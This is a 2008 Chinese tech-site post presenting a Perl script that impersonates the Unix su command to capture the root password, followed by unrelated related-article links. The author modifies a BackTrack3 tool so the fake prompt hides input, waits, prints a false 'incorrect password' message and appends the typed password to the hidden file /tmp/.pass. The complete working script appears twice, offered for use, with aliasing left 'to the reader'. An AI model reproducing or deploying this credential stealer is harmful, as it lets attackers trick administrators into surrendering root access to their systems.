冒充su ,perl写的su.pl盗取root密码
更新时间:2008年09月14日 08:16:59 作者:
backtrack3里面/pentest/housekeeping里面有个超囧的偷root密码的东西,冒充su ,perl写的,管理员输入密码的时候还直接回显
我改了一下,把回显关了 加了个延时:
#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.
print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);
很明显直接用是8行的,还有别名恢复等工作要做,各位看官自己搞定!
#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.
print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);
很明显直接用是8行的,还有别名恢复等工作要做,各位看官自己搞定!
相关文章
在编程时把一段代码注释掉,即通过注释的方法,使其不能够运行,但是依然存在于代码中,等以后需要时再去掉注释2013-03-03
这篇文章主要介绍了基于charles抓取https请求使用过程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下2020-11-11
perl常问题集合之一...2007-03-03
这两天在用Perl编写一些监控脚本,其实写代码也是一件挺有意思的事情,就是挺废时间的。而且,由于语法不太熟,基本想到一个东西都要先Google一下看怎么实现。2008-06-06![[Perl]文字/代码批量替换工具](//img.jbzj.com/images/xgimg/bcimg4.png)
[Perl]文字/代码批量替换工具...2007-04-04
最近在实习,看着公司有些脚本是perl写,久闻perl处理文本还是很强大的,趁着周末扫了一般这本书~记录下了~2014-08-08
Perl里可以调用Shell命令,有时需要根据shell命令的返回结果做进一步的工作,如何获得shell的执行结果?2008-12-12
fdupe 是一个很小的 Perl 脚本,用来检索指定目录并找出其中重复的文件,该脚本是通过文件内容来识别是否重复文件,而非文件名。fdupe 无需其他 Perl 脚本支持,运行速度非常快2013-03-03
perl常见问题集合之二...2007-03-03
php是用了很久了,python和ruby与用过,经典脚本语言就perl没摸过,现在在像小学生一样抱着教科书啃。2008-09-09
![[Perl]文字/代码批量替换工具](http://img.jbzj.com/images/xgimg/bcimg4.png)
最新评论